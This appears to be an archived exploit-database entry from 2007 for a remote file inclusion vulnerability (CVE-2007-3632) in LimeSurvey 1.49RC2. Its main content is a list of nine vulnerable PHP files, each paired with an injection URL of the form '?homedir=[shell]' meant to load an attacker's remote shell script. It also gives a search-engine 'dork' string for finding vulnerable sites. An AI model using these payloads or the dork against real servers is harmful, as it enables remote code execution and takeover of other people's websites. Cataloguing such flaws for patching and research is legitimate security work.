LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion

Author: Yakir Wizman
type: webapps
platform: php
port: 
date_added: 2007-07-05  
date_updated:   
verified: 1  
codes: OSVDB-45799;CVE-2007-3632;OSVDB-45798;OSVDB-45797;OSVDB-45796;OSVDB-45795;OSVDB-45794;OSVDB-45793;OSVDB-45792;OSVDB-45791  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4156.txt  
## Owner : Pr0T3cT10n
## Email : Pr0T3cT10n@Gmail.Com
## Homepage : www.kamikaz-team.com
## Script site : www.limesurvey.org
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2
## Type : RFI(Remote File Include)
## Source : http://sourceforge.net/project/showfiles.php?group_id=74605
## D0rk : "You have not provided a survey identification number"

## Bug :
	## Files :
		## /admin/classes/pear/OLE/PPS/File.php
		## /admin/classes/pear/OLE/PPS/Root.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer.php
		## /admin/classes/pear/OLE/PPS.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php

## Exploit :
		## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
		## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]
		## /admin/classes/pear/OLE/PPS.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]

## Thanks : str0ke

# milw0rm.com [2007-07-06]